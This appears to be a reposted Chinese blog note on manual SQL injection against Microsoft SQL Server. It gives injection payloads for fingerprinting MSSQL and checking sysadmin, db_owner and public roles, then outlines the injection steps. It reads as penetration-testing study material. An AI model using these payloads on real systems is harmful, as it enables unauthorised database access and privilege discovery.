首页 > 数据库技术 > 详细

Microsoft SQL Server手注

时间:2021-04-21 10:30:46      阅读:20      评论:0      收藏:0      [点我收藏+]

与mysql主要不同是在语法
判断是否为Mssql数据库
and exists(select * from sysobjects) --
判断权限

and 1=(select is_srvrolemember(‘sysadmin‘)) //sa权限:数据库操作,?件管理,命令执?,注册表读取等 system
 and 1=(select is_srvrolemember(‘db_owner‘)) //db权限:?件管理,数据库操作等 users-adminstrators
 and 1=(select is_srvrolemember(‘public‘)) //public权限:数据库操作 guest-users

注入流程基本一致
1.判断注入
2.字段长度
3.寻找字符型显位
4.查询
借鉴一篇佳作https://www.naraku.cn/posts/67.html

Microsoft SQL Server手注

原文:https://www.cnblogs.com/lulu-3214536072/p/14683526.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!